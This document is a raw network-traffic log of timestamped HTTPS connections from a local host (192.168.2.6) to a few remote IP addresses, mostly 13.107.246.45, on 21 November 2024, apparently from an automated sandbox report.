Nov 21, 2024 09:54:21.862354040 CET	443	49847	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.862488985 CET	49847	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.862576962 CET	49847	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.862576962 CET	49847	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.862622023 CET	443	49847	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.862648010 CET	443	49847	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.865201950 CET	49852	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.865292072 CET	443	49852	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:21.865417004 CET	49852	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.865556955 CET	49852	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:21.865600109 CET	443	49852	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.198427916 CET	443	49850	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.198980093 CET	49850	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.199019909 CET	443	49850	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.199418068 CET	49850	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.199425936 CET	443	49850	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.223109961 CET	443	49849	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.226670027 CET	443	49849	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.226758957 CET	49849	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.226809978 CET	49849	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.226833105 CET	443	49849	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.226849079 CET	49849	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.226857901 CET	443	49849	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.229553938 CET	49853	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.229604006 CET	443	49853	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.229680061 CET	49853	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.229882956 CET	49853	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.229898930 CET	443	49853	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.299458981 CET	443	49848	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.302498102 CET	443	49848	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.302573919 CET	49848	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.302686930 CET	49848	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.302686930 CET	49848	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.302756071 CET	443	49848	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.302786112 CET	443	49848	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.305526972 CET	49854	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.305610895 CET	443	49854	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.305696964 CET	49854	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.305831909 CET	49854	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.305866003 CET	443	49854	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.640460968 CET	443	49850	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.643789053 CET	443	49850	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.643865108 CET	49850	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.643969059 CET	49850	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.644004107 CET	443	49850	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.644062042 CET	49850	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.644078016 CET	443	49850	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.646826029 CET	49855	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.646877050 CET	443	49855	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:22.646939993 CET	49855	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.647171021 CET	49855	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:22.647186041 CET	443	49855	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:23.470773935 CET	443	49851	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:23.478143930 CET	49851	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:23.478158951 CET	443	49851	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:23.479062080 CET	49851	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:23.479075909 CET	443	49851	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:23.580804110 CET	443	49852	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:23.581341028 CET	49852	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:23.581362009 CET	443	49852	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:23.581976891 CET	49852	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:23.581980944 CET	443	49852	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:23.905554056 CET	443	49851	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:23.908524036 CET	443	49851	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:23.908632040 CET	49851	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:23.908710003 CET	49851	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:23.908710003 CET	49851	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:23.908726931 CET	443	49851	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:23.908736944 CET	443	49851	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:23.911745071 CET	49856	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:23.911786079 CET	443	49856	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:23.911961079 CET	49856	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:23.912106991 CET	49856	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:23.912122011 CET	443	49856	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.021634102 CET	443	49852	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.024730921 CET	443	49852	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.024785995 CET	443	49852	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.024820089 CET	49852	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.024890900 CET	49852	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.025863886 CET	49852	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.025907040 CET	443	49852	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.029676914 CET	49857	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.029747963 CET	443	49857	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.030822992 CET	49857	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.031178951 CET	49857	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.031217098 CET	443	49857	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.080406904 CET	443	49853	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.080986023 CET	49853	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.081008911 CET	443	49853	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.081444025 CET	49853	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.081449032 CET	443	49853	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.149799109 CET	443	49854	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.150329113 CET	49854	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.150391102 CET	443	49854	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.150960922 CET	49854	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.150980949 CET	443	49854	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.427465916 CET	443	49855	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.428035021 CET	49855	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.428056002 CET	443	49855	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.428473949 CET	49855	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.428479910 CET	443	49855	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.532381058 CET	443	49853	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.535485983 CET	443	49853	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.535579920 CET	49853	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.535728931 CET	49853	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.535746098 CET	443	49853	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.535757065 CET	49853	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.535763025 CET	443	49853	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.538624048 CET	49858	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.538647890 CET	443	49858	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.538726091 CET	49858	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.538863897 CET	49858	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.538875103 CET	443	49858	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.602221012 CET	443	49854	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.602329969 CET	443	49854	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.602374077 CET	443	49854	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.602397919 CET	49854	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.602442026 CET	49854	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.602554083 CET	49854	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.602571964 CET	443	49854	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.602596045 CET	49854	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.602601051 CET	443	49854	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.605386972 CET	49859	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.605411053 CET	443	49859	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.605480909 CET	49859	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.605608940 CET	49859	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.605622053 CET	443	49859	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.870263100 CET	443	49855	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.873593092 CET	443	49855	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.873678923 CET	49855	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.873722076 CET	49855	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.873722076 CET	49855	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.873743057 CET	443	49855	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.873754978 CET	443	49855	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.876728058 CET	49860	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.876766920 CET	443	49860	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:24.876853943 CET	49860	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.876961946 CET	49860	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:24.876969099 CET	443	49860	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:25.384408951 CET	49722	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:54:25.384429932 CET	443	49722	185.221.216.102	192.168.2.6
Nov 21, 2024 09:54:25.763071060 CET	443	49856	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:25.763608932 CET	49856	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:25.763629913 CET	443	49856	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:25.764164925 CET	49856	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:25.764172077 CET	443	49856	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:25.811975956 CET	443	49857	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:25.812591076 CET	49857	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:25.812628984 CET	443	49857	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:25.813065052 CET	49857	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:25.813071966 CET	443	49857	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.214773893 CET	443	49856	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.218831062 CET	443	49856	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.218909979 CET	49856	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.218985081 CET	49856	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.219002962 CET	443	49856	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.219016075 CET	49856	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.219022989 CET	443	49856	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.221848965 CET	49861	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.221966028 CET	443	49861	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.222218990 CET	49861	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.222419977 CET	49861	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.222457886 CET	443	49861	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.255470991 CET	443	49857	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.258454084 CET	443	49857	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.258516073 CET	49857	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.258593082 CET	49857	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.258593082 CET	49857	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.258615971 CET	443	49857	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.258635044 CET	443	49857	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.260968924 CET	49862	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.260991096 CET	443	49862	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.261161089 CET	49862	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.261395931 CET	49862	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.261403084 CET	443	49862	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.389062881 CET	443	49859	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.389573097 CET	49859	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.389609098 CET	443	49859	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.390034914 CET	49859	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.390041113 CET	443	49859	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.391036034 CET	443	49858	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.391395092 CET	49858	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.391413927 CET	443	49858	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.391762972 CET	49858	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.391769886 CET	443	49858	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.600609064 CET	443	49860	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.601170063 CET	49860	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.601183891 CET	443	49860	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.601562023 CET	49860	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.601567030 CET	443	49860	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.832041025 CET	443	49859	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.835340023 CET	443	49859	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.835746050 CET	49859	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.835747004 CET	49859	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.835747004 CET	49859	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.839193106 CET	49863	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.839292049 CET	443	49863	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.839421034 CET	49863	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.839589119 CET	49863	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.839615107 CET	443	49863	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.842159033 CET	443	49858	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.842276096 CET	443	49858	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.842335939 CET	49858	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.842376947 CET	443	49858	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.842401028 CET	443	49858	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.842458963 CET	49858	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.842509985 CET	49858	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.842529058 CET	443	49858	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.842540979 CET	49858	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.842547894 CET	443	49858	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.845036030 CET	49864	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.845078945 CET	443	49864	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:26.845233917 CET	49864	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.845432997 CET	49864	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:26.845448971 CET	443	49864	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:27.034780025 CET	443	49860	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:27.037849903 CET	443	49860	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:27.037997961 CET	49860	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:27.038028002 CET	49860	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:27.038028002 CET	49860	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:27.038052082 CET	443	49860	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:27.038064003 CET	443	49860	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:27.041352034 CET	49865	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:27.041419029 CET	443	49865	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:27.041493893 CET	49865	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:27.041704893 CET	49865	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:27.041724920 CET	443	49865	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:27.150073051 CET	49859	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:27.150136948 CET	443	49859	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.005160093 CET	443	49861	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.005629063 CET	49861	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.005665064 CET	443	49861	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.006066084 CET	49861	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.006076097 CET	443	49861	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.106214046 CET	443	49862	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.106623888 CET	49862	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.106633902 CET	443	49862	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.107084036 CET	49862	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.107090950 CET	443	49862	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.448376894 CET	443	49861	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.451759100 CET	443	49861	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.451821089 CET	49861	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.451867104 CET	49861	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.451888084 CET	443	49861	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.451906919 CET	49861	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.451914072 CET	443	49861	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.454476118 CET	49866	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.454523087 CET	443	49866	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.454603910 CET	49866	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.454766989 CET	49866	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.454797029 CET	443	49866	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.558417082 CET	443	49862	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.558444023 CET	443	49862	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.558500051 CET	49862	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.558507919 CET	443	49862	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.558541059 CET	443	49862	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.558600903 CET	49862	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.558810949 CET	49862	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.558825016 CET	443	49862	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.558835030 CET	49862	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.558840990 CET	443	49862	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.561471939 CET	49867	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.561577082 CET	443	49867	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.561682940 CET	49867	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.561846018 CET	49867	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.561870098 CET	443	49867	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.631983995 CET	443	49864	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.632761002 CET	49864	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.632761002 CET	49864	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.632801056 CET	443	49864	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.632837057 CET	443	49864	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.683300018 CET	443	49863	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.683713913 CET	49863	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.683756113 CET	443	49863	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.684020042 CET	49863	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.684029102 CET	443	49863	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.834178925 CET	49868	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:54:28.834247112 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:28.834847927 CET	443	49865	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.835025072 CET	49868	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:54:28.835480928 CET	49865	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.835483074 CET	49868	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:54:28.835505962 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:28.835540056 CET	443	49865	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:28.836302996 CET	49865	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:28.836314917 CET	443	49865	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.075007915 CET	443	49864	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.078051090 CET	443	49864	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.078145981 CET	49864	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.078154087 CET	443	49864	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.078262091 CET	49864	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.078308105 CET	49864	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.078308105 CET	49864	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.078341961 CET	443	49864	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.078367949 CET	443	49864	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.080564976 CET	49869	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.080612898 CET	443	49869	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.080823898 CET	49869	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.080856085 CET	49869	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.080862999 CET	443	49869	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.136799097 CET	443	49863	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.139930964 CET	443	49863	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.140127897 CET	49863	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.140127897 CET	49863	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.140127897 CET	49863	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.142080069 CET	49870	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.142127991 CET	443	49870	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.142326117 CET	49870	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.142362118 CET	49870	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.142369986 CET	443	49870	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.278291941 CET	443	49865	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.281424046 CET	443	49865	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.281568050 CET	49865	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.281568050 CET	49865	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.281663895 CET	49865	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.281707048 CET	443	49865	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.284081936 CET	49871	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.284126997 CET	443	49871	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.284388065 CET	49871	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.284388065 CET	49871	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.284424067 CET	443	49871	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:29.445939064 CET	49863	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:29.446003914 CET	443	49863	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.235285997 CET	443	49866	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.235766888 CET	49866	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.235811949 CET	443	49866	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.236263037 CET	49866	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.236277103 CET	443	49866	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.285764933 CET	443	49867	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.286147118 CET	49867	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.286197901 CET	443	49867	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.286518097 CET	49867	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.286533117 CET	443	49867	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.660841942 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:30.660942078 CET	49868	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:54:30.662182093 CET	49868	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:54:30.662199020 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:30.662610054 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:30.663774967 CET	49868	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:54:30.679332018 CET	443	49866	13.107.246.45	192.168.2.6
